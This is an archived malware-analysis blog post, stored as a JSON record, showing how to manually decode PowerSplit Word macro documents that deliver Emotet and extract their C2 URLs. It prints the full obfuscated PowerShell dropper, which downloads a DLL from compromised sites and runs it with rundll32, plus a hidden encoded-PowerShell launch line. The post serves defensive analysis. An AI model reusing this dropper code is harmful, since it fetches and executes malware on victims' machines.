{
	"id": "50bf7931-2bba-46f3-b55c-1bd9c01bfe67",
	"created_at": "2026-04-06T00:07:58.697671Z",
	"updated_at": "2026-04-10T13:13:08.67311Z",
	"deleted_at": null,
	"sha1_hash": "18148db41266afa60030469ab3a8afb2d774c4a1",
	"title": "Manual analysis of new PowerSplit maldocs delivering Emotet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1728739,
	"plain_text": "Manual analysis of new PowerSplit maldocs delivering Emotet\r\nBy Published by R3MRUM View all posts by R3MRUM\r\nPublished: 2021-01-06 · Archived: 2026-04-06 00:05:48 UTC\r\nWow. It’s been a long time since my last blog post (~ 2 years). The new year has inspired me to dust off some cobwebs and\r\nproduce a blog post that hopefully someone can learn from.\r\nIn this post, I’ll be covering how to perform manual analysis of the new PowerSplit malicious documents (maldocs) that\r\nwere first seen in the wild starting in mid/late December 2020. Thus far, I’ve only seen this version of PowerSplit delivering\r\nEmotet but in the past it has delivered other families such as Retefe and Gozi ISFB.\r\nPreferably, initial analysis of these types of maldocs would simply consist of submitting the sample some kind of sandbox\r\nenvironment. Since PowerSplit doesn’t employ any kind of anti-analysis or anti-vm controls, other than some obfuscation,\r\nthe sample should fully detonate and the malicious powershell command executed by the maldoc should be present within\r\nthe detonation output. The target audience for this post are those who either want to get their hands dirty or do not have the\r\nability to submit their sample to a sandbox.\r\nNote for the reader: My analysis in this post details the shortcut I use in order to quickly get to the important artifacts such\r\nas malicious command executed by the maldoc and the corresponding C2 URLs embedded within. This shortcut skips over a\r\nfew concepts like how the macro is automatically executed when the document is opened and how I determined that\r\nDdyw4mboy7b (referenced later on) is an instance of the winmgmtS:win32_process class for the sake of brevity.\r\nSample for reference:\r\nhttps://www.virustotal.com/gui/file/1b14150ed4bc2faa4dadc5e2096f77175c8274927c13aae437a9cc57ff26fd3b/\r\nInitial Setup\r\nCopy the maldoc into a virtual machine (VM) isolated from the network (Host-Only mode). 
This is kind of a big deal.\r\nTriple check that this host doesn’t have network access to anything.\r\nWithin the isolated VM, open the maldoc with Microsoft Word. You should be presented with something similar to this:\r\nhttps://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/\r\nPage 1 of 11\n\nEnable editing by selecting View –\u003e Edit Document from the toolbar menu.\r\nEnsure that you have the Developer tab enabled (File –\u003e Options –\u003e Customize Ribbon –\u003e Add ‘Developer’ to the Main\r\nTabs). You should see the Developer tab, like so:\r\nAnalysis in VB Editor\r\nOn the Developer tab, click the Visual Basic button. This will open the Visual Basic (VB) Editor where you can access the\r\nembedded macros. Locate the module that contains macro code. Thus far, these PowerSplit maldocs have only contained\r\ntwo entries in the modules section. In this example, one module is named E2ajbo3kwzka_d5z and the other is\r\nQtep_eof7eoc0a. As shown in this screenshot, the module Qtep_eof7eoc0a is empty. So, we can ignore it.\r\nIn the module that contains the code (E2ajbo3kwzka_d5z), scroll to the very bottom and then slowly scroll up, looking for\r\nthe pattern:\r\n\u003crandom_string\u003e.Create \u003crandom_string\u003e(\u003crandom_string\u003e), \u003crandom_string\u003e,\u003crandom_string\u003e\r\nIt will likely be the first ‘long’ line you will encounter as you scroll up. In this sample, it is on line 233 of the macro:\r\nDdyw4mboy7b.Create Jmz4_bcx3_h(Kb3vxm90vt0_lgn8r3), Zj0kk9rvc7emht, Coyz3quoogwk6on\r\nBreaking down what this means\r\nDdyw4mboy7b is an instance of the winmgmtS:win32_process class. 
The Create function of this class is being called with\r\n3 arguments:\r\nArg1 = Jmz4_bcx3_h(Kb3vxm90vt0_lgn8r3)\r\nArg2 = Zj0kk9rvc7emht\r\nArg3 = Coyz3quoogwk6on\r\nMicrosoft’s documentation on win32_process’s Create function says that the first argument\r\n(Jmz4_bcx3_h(Kb3vxm90vt0_lgn8r3)) passed to the Create function is the CommandLine value to be executed. The value\r\nbeing passed is actually a call to a function named Jmz4_bcx3_h. This is the maldoc’s string decoder function that takes in\r\nan encoded string, stored in the variable Kb3vxm90vt0_lgn8r3, and returns the decoded version.\r\nArg2 (Zj0kk9rvc7emht) and Arg3 (Coyz3quoogwk6on) represent the CurrentDirectory and ProcessStartupInformation\r\nrespectively. For the purposes of this analysis, we don’t care about Arg2 and Arg3… but we need to somehow capture the\r\ndecoded value that is ultimately passed as Arg1.\r\nTo do this, we need to first comment out the line containing the call to win32_process’s Create function so that it does not\r\nexecute. This can be accomplished by prepending a single quotation mark to the beginning of the line. This essentially\r\ndefangs the maldoc.\r\nNext, we need to capture the decoded Arg1 value, which represents the command that the maldoc is attempting to execute.\r\nWe can accomplish this by printing out the result of the string decoder function call that was originally passed as Arg1 to the\r\nDdyw4mboy7b.Create function.\r\nThere are a few ways to do this but my preferred method is to use Debug.Print(). Add a Debug.Print statement, passing it the\r\nArg1 value, just above the commented-out line. If done right, the macro will look like this:\r\nIn order to see the output when the Debug.Print statement is called, we need to enable the ‘Immediate Window’. To do this,\r\neither hit CTRL+G or go to View –\u003e Immediate Window within the VB Editor. 
If done correctly, a new window labeled\r\nImmediate will appear at the bottom of the VB Editor window.\r\nNow save the modified macro in the VB Editor (CTRL+S).\r\nBefore moving on to the next step, I must reiterate to only do this within an isolated virtual machine. Even though we\r\ntechnically defanged THIS document, there is the potential that a different variant could have additional code that\r\nwe have not accounted for in this analysis. Failing to detonate in an isolated VM could result in host system infection\r\nand potential spreading to other resources on the network… that would be bad.\r\nNow switch back to the Word document from the VB Editor and click the ‘Enable Content’ button. Doing so will\r\nautomatically execute the embedded macro… but this is what we want to happen. We want the macro to execute so that\r\nthe string decoding will take place and the decoded string will be printed by the Debug.Print statement that we inserted. The\r\nactual malicious command will not execute because we commented out the line that was responsible for that action.\r\nTo see if this worked correctly, go back to the VB Editor and inspect the contents of the Immediate window. You should see\r\nthe decoded command that the maldoc was attempting to execute.\r\nFor this sample, the malicious command being executed by the maldoc is a base64 encoded powershell command that\r\nincludes a pop-up message box that is displayed to the victim when run (Note: this command has not been defanged. DO\r\nNOT RUN on un-isolated host):\r\ncmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. \u0026 POwersheLL -w hidden -ENCOD\r\n\u003cSlight Tangent\u003e\r\nA vast majority of the code contained within this macro is junk code that has been inserted to cause confusion and to\r\ncomplicate analysis. 
In this example, all code pertaining to the writing of some file is junk code and can be removed without\r\nimpacting the functionality of the macro. The junk code pattern is:\r\nDim \u003crandom_string\u003e As String\r\nOpen \"\u003crandom_string\u003e\" For Binary As \u003crandom_int\u003e\r\nPut #\u003crandom_int\u003e, , \u003crandom_string\u003e\r\nClose #\u003crandom_int\u003e\r\nKnowing this, you could clean up the code a bit by doing a find for the following regex pattern and replacing it with\r\nnothing:\r\nDim.*\\nOpen.*\\nPut.*\\nClose.*\r\nAdditionally, since control flow is executed in order and doesn’t jump around, the GoTo statements included can also be\r\nconsidered junk. Doing a similar find/replace for the following pattern cleans up the code even further:\r\n*Goto.*\\n{1,}.*:\\n\r\nTaking these two steps reduced the total lines of code in the macro from 348 to 24, revealing the true core code that is\r\nleveraged by the maldoc:\r\n\u003c/Slight Tangent\u003e\r\nEncoded PowerShell Analysis\r\nOnce base64-decoded, the heavily encoded powershell script being executed is:\r\n$E3Sy   = [TYPE] ( \"{4}{3}{0}{1}{5}{2}\" -\r\nf 'M.Io.D' , 'iRe' , 'TORY' , 'Ste' , 'sy' , 'C' ) ;\r\nSeT-ITEM VARIabLE:i7RpVz ( [TYPE] ( \"{1}{4}{2}{0}{6}{3}{7}{5}\" -f\r\n'ET.SeRVi' , 'S' , 'TEm.N' , 'INT' , 'yS' , 'AnAgEr' , 'CePo' , 'M' )) ;\r\n$Xsejjoo =( 'N' +( 'avc' + 'lg' )+ 'u' );\r\n$Slfr1gp = $Rpb56t4 + [char] (64) + $U9nybjs ;\r\n$Wwuhcfs =(( 'U_m' + '4k' )+ 'pq' );\r\n( gET-vARIaBle   e3sY -vAlUeOn ):: \"CReaTEDire`c`ToRY\" ( $HOME + (( 'Y' + 'b' + 'sR' +\r\n( 'g064' + '6rYbs' + 'Q' + '9' )+( '0xm' + 'rq' + 'Yb' )+ 's' ) -REPlaCe\r\n( 'Y' + 'bs' ), [cHAr] 92));\r\n$K309qw1 =(( 'Rq' + 'rm' )+( 'b2' + '8' ));\r\n( Ls variAble:i7rPvZ ).vaLUe:: \"SEcUri`TYpRo`TOc`ol\" = 
(( 'Tls' + '1' )+ '2' );\r\n$Nmh1wmf =(( 'X3b6' + 'g' )+ 'a' + 'o' );\r\n$Ojz_wa7 = ( 'M' +( '8jkl' + 'v4' ));\r\n$Xgtwzgh =(( 'Cc' + 'k0h' )+ '16' );\r\n$Qqayu6h =( 'B' +( 'e6' + 'f' )+( 'r' + 'w0' ));\r\n$Jdgza5o = $HOME +(( '{0' + '}Rg0646r' + '{' + '0}Q90' + 'xmrq{' + '0}' ) -F  \r\n[ChAR] 92)+ $Ojz_wa7 +(( '.' + 'dl' )+ 'l' );\r\n$N05q5t5 =( 'O' +( '_' + '3' + 'e2pf' ));\r\n$Gkhm1tg = neW-Ob `j`ECT NeT.WEBClieNt;\r\n$Jkdys0o =(((( 'ht' + 't' + 'p:J' + ')(3s2)' ))+( '(' + 'J)(3s2' + ')' )+\r\n(( '(zh' + 'o' ))+( 'ngs' + 'h' + 'ixingc' + 'hua' )+( 'n' + 'g.' )+ 'c' + 'om' +\r\n(( 'J)(3s2' + ')' ))+ '(' + 'wp' +( '-' + 'adminJ' )+(( ')(' ))+(( '3s' + '2)' ))+\r\n(( '(OTmJ' + ')(' + '3s' + '2)(@' ))+( 'ht' + 't' )+( 'p' + ':J' )+\r\n(( ')' + '(3s2' ))+(( ')(' + 'J' ))+(( ')(' + '3s' ))+ '2' +(( ')\r\n(' ))+ 'w' + 'w' + 'w' +( '.gre' + 'a' )+ 'u' +( 'ds' + 'tu' )+( 'd' + 'io' )+\r\n(( '.c' + 'omJ)' + '(3s' ))+ '2' +(( ')(d' + 'o' + 'cs' ))+\r\n(( 'J' + ')' + '(3s2)' ))+(( '(FGnJ' + ')' + '(' + '3' + 's2)(@http:J)\r\n(' ))+ '3' + 's' +(( '2)(' + 'J)' + '(3s' ))+(( '2)(k' + 'o' ))+ 'r' +\r\n( 'ea' + 'nk' + 'id' )+( 's' + 'ed' )+( 'u.c' + 'om' )+(( 'J)(' + '3' ))+ 's2' +\r\n(( ')(' + 'wp-co' + 'n' ))+( 'ten' + 't' )+(( 'J)' ))+(( '(3' + 's2)(' ))+\r\n( '2c' + 'Q' )+(( 'ThJ' + ')' ))+(( '(3' + 's' ))+(( '2)' + '(@ht' + 't' + 'p:J)\r\n(' + '3s2)(J' + ')' + '(' ))+( '3s' + '2' )+ ')' + '(' +\r\n( 'exp' + 'edi' )+ 'ti' + 'o' +( 'nq' + 'ue' )+ 'st' + '.c' + 'o' + 'mJ' +(( ')\r\n(' ))+(( '3s' + '2' + ')(XJ)(' ))+(( '3s' + '2)' ))+\r\n(( '(' + '@http' + 's:J' ))+ ')' + '(' +(( '3s' + '2)' + '(J' + ')(3' ))+\r\n(( 's' + '2)(' ))+( 'su' + 'r' )+ 'i' +( 'agr' + 'o' )+( 'f' + 'res' + 'h.' 
)+\r\n( 'co' + 'm' )+(( 'J)(3s' + '2' ))+(( ')(se' + 're' ))+(( 'versJ)' + '(3s' ))+(( '2)\r\n(' + 'M' ))+ 'VD' + 'j' +(( 'IJ)(3s2' + ')(' + '@' ))+(( 'htt' + 'p:' + 'J)\r\n(3' ))+ 's2' +(( ')' + '(J)' + '(3s' ))+(( '2)(g' + 'e' + 'of' ))+\r\n( 'f' + 'og' )+ 'le' +( 'mus' + 'ic' + '.' )+(( 'comJ)' + '(3' + 's2)' + '(' + 'wp-a' + 'd' ))+(( 'mi' + 'n' + 'J)(' ))+(( '3s2)(x' + 'J)(3' + 's2)' + '(' ))+ '@' +\r\n( 'h' + 'ttp' )+(( 's:J)(' + '3' + 's2' ))+(( ')' + '(J' ))+(( ')(' ))+(( '3s' + '2)\r\n(' ))+( 'd' + 'ag' )+( 'r' + 'ani' )+ 't' +( 'egiare' + '.co' + 'mJ' )+ ')' +\r\n( '(3s2' + ')' )+ '(' +( 'w' + 'p-' )+( 'a' + 'dmin' )+(( 'J' + ')\r\n(' ))+ '3' + 's' + '2' +(( ')' + '(jCHJ' + ')(3' ))+ 's' +(( '2' + ')\r\n(' )))). \"RePla`Ce\" ((((( 'J)(3' + 's' ))+(( '2' + ')(' )))),( [array] ( '/' ),\r\n( 'hw' + 'e' ))[0]). \"S`PliT\" ( $Biy7vfz + $Slfr1gp + $Z7vulcv );\r\n$Dmqi8pi =( 'P' +( 'jdu' + 'dc9' ));\r\nforeach ( $Zp5knry in $Jkdys0o | S`ORt-`oBJ`E`Ct {g`ET-r`An`DOm}){\r\ntry{\r\n$Gkhm1tg . \"DOwnlo`A`DfILE\" ( $Zp5knry , $Jdgza5o );\r\n$Zdcj0cn =( 'H' +( '3' + 'q09k' )+ 'q' );\r\nIf ((\u0026( 'Get-It' + 'e' + 'm' ) $Jdgza5o ). \"L`eng`TH\" -ge 39887) {\r\n\u0026( 'r' + 'un' + 'dll32' ) $Jdgza5o , '#1' . \"TOs`T`RinG\" ();\r\n$Hao086y =( 'Ok' + 'mb' +( 'e0' + '8' ));\r\nbreak ;\r\n$Yvi_mtb =(( 'B0' + 'f0' )+ 'kg' + 'm' )\r\n}\r\n}\r\ncatch{}\r\n}\r\n$Pf4ctyc =(( 'K' + 'jo' )+ '4' +( 'bm' + 'g' ))\r\nNote for the reader: formatting of the above code was cleaned up a bit by putting individual statements on their own line as\r\nopposed to the original format which had everything on a single line.\r\nThough encoding styles have changed over time, the PowerSplit maldoc has been generally consistent with how it stores and\r\ndecodes its C2 URLs. 
The consistency of this format is actually how PowerSplit got its name (the amalgamation of\r\n“PowerShell” and the Split() function). Line 16 highlighted in the code above (the $Jkdys0o assignment, also displayed below) contains the pattern\r\nthat we need to look for. Typically, with PowerSplit, the C2 URLs are contained within a large encoded string (highlighted\r\nin green) that is passed through a replace function (highlighted in red) that performs the ‘decode’. The decoded string, which\r\nnow consists of concatenated C2 URLs separated by some delimiter, is then passed to a split function (highlighted in blue)\r\nthat converts the single string into an array of C2 URLs:\r\n$Jkdys0o=((((‘ht’+’t’+’p:J’+’)(3s2)’))+(‘(‘+’J)(3s2’+’)’)+((‘(zh’+’o’))+(‘ngs’+’h’+’ixingc’+’hua’)+(‘n’+’g.’)+’c’+’om’+\r\n((‘J)(3s2’+’)’))+'(‘+’wp’+(‘-‘+’adminJ’)+((‘)(‘))+((‘3s’+’2)’))+((‘(OTmJ’+’)(‘+’3s’+’2)(@’))+(‘ht’+’t’)+(‘p’+’:J’)+\r\n((‘)’+'(3s2’))+((‘)(‘+’J’))+((‘)(‘+’3s’))+’2’+((‘)(‘))+’w’+’w’+’w’+(‘.gre’+’a’)+’u’+(‘ds’+’tu’)+(‘d’+’io’)+\r\n((‘.c’+’omJ)’+'(3s’))+’2’+((‘)(d’+’o’+’cs’))+((‘J’+’)’+'(3s2)’))+((‘(FGnJ’+’)’+'(‘+’3’+’s2)(@http:J)(‘))+’3’+’s’+((‘2)\r\n(‘+’J)’+'(3s’))+((‘2)(k’+’o’))+’r’+(‘ea’+’nk’+’id’)+(‘s’+’ed’)+(‘u.c’+’om’)+((‘J)(‘+’3’))+’s2’+((‘)(‘+’wp-co’+’n’))+\r\n(‘ten’+’t’)+((‘J)’))+((‘(3’+’s2)(‘))+(‘2c’+’Q’)+((‘ThJ’+’)’))+((‘(3’+’s’))+((‘2)’+'(@ht’+’t’+’p:J)(‘+’3s2)(J’+’)’+'(‘))+\r\n(‘3s’+’2′)+’)’+'(‘+(‘exp’+’edi’)+’ti’+’o’+(‘nq’+’ue’)+’st’+’.c’+’o’+’mJ’+((‘)(‘))+((‘3s’+’2’+’)(XJ)(‘))+((‘3s’+’2)’))+\r\n((‘(‘+’@http’+’s:J’))+’)’+'(‘+((‘3s’+’2)’+'(J’+’)(3′))+((‘s’+’2)(‘))+(‘su’+’r’)+’i’+(‘agr’+’o’)+(‘f’+’res’+’h.’)+(‘co’+’m’)+\r\n((‘J)(3s’+’2’))+((‘)(se’+’re’))+((‘versJ)’+'(3s’))+((‘2)(‘+’M’))+’VD’+’j’+((‘IJ)(3s2’+’)(‘+’@’))+((‘htt’+’p:’+’J)(3’))+’s2’+\r\n((‘)’+'(J)’+'(3s’))+((‘2)(g’+’e’+’of’))+(‘f’+’og’)+’le’+(‘mus’+’ic’+’.’)+((‘comJ)’+'(3’+’s2)’+'(‘+’wp-a’+’d’))+\r\n((‘mi’+’n’+’J)(‘))+((‘3s2)(x’+’J)(3’+’s2)’+'(‘))+’@’+(‘h’+’ttp’)+((‘s:J)(‘+’3’+’s2’))+((‘)’+'(J’))+((‘)(‘))+((‘3s’+’2)(‘))+\r
\n(‘d’+’ag’)+(‘r’+’ani’)+’t’+(‘egiare’+’.co’+’mJ’)+’)’+(‘(3s2’+’)’)+'(‘+(‘w’+’p-‘)+(‘a’+’dmin’)+((‘J’+’)(‘))+’3’+’s’+’2’+\r\n((‘)’+'(jCHJ’+’)(3′))+’s’+((‘2’+’)(‘)))).“RePla Ce\"((((('J)(3'+'s'))+(('2'+')(')))),([array]('/'),('hw'+'e'))\r\n[0]) . \"S PliT”($Biy7vfz + $Slfr1gp + $Z7vulcv);\r\nTo decode, copy and paste the above line into a PowerShell command prompt and hit Enter. This will place the decoded\r\ncontents into the variable $Jkdys0o. Then type the variable name ($Jkdys0o in this case) and hit Enter to display the\r\nvariable’s contents, which should be the list of C2 URLs:\r\nOutput (Note: URLs manually defanged):\r\nhxxp://zhongshixingchuang[.]com/wp-admin/OTm/@hxxp://www.greaudstudio[.]com/docs/FGn/@hxxp://koreankidsedu[.]com/wp-content/2cQTh/@hxxp://expeditionquest[.]com/X/@hxxps://suriagrofresh[.]com/serevers/MVDjI/@hxxp://geoffoglemusic[.]com/wp-admin/x/@hxxps://dagranitegiare[.]com/wp-admin/jCH/\r\nBecause we extracted this single line from the script, the code that initializes and assigns values to the variables $Biy7vfz,\r\n$Slfr1gp, and $Z7vulcv that are used in the Split function is missing. As a result, the URL string was never properly\r\nconverted to an array… but that is ok. 
We can apply some common sense here and realize that the string was split via the\r\n‘@’ symbol which would have yielded the following output:\r\nhxxp://zhongshixingchuang[.]com/wp-admin/OTm/\r\nhxxp://www.greaudstudio[.]com/docs/FGn/\r\nhxxp://koreankidsedu[.]com/wp-content/2cQTh/\r\nhxxp://expeditionquest[.]com/X/\r\nhxxps://suriagrofresh[.]com/serevers/MVDjI/\r\nhxxp://geoffoglemusic[.]com/wp-admin/x/\r\nhxxps://dagranitegiare[.]com/wp-admin/jCH/\r\nEmotet Binary\r\nAt the time of analysis, these C2 URLs were serving up Emotet.\r\nMD5: 53cccd74cdd275d5388405f26eda4de4\r\nSHA1: 225923659b850fcf5d3d53acec94de55e4f28114\r\nSHA256: cf4bcb53551a7a8e87edd6ebe1382981cc6280eed58905870d04219a12801e83\r\nSince Emotet analysis isn’t the focus of this blog, I’ll simply suggest here that you use something like the CAPEv2 Sandbox\r\nto also automatically extract the Emotet configuration from the binary downloaded by the PowerSplit maldoc. For example:\r\nhttps://capesandbox.com/analysis/110589/#CAPE\r\nConfigured Emotet 
C2s:\r\nSource: https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/"
	],
	"report_names": [
		"manual-analysis-of-new-powersplit-maldocs-delivering-emotet"
	],
	"threat_actors": [],
	"ts_created_at": 1775434078,
	"ts_updated_at": 1775826788,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18148db41266afa60030469ab3a8afb2d774c4a1.pdf",
		"text": "https://archive.orkl.eu/18148db41266afa60030469ab3a8afb2d774c4a1.txt",
		"img": "https://archive.orkl.eu/18148db41266afa60030469ab3a8afb2d774c4a1.jpg"
	}
}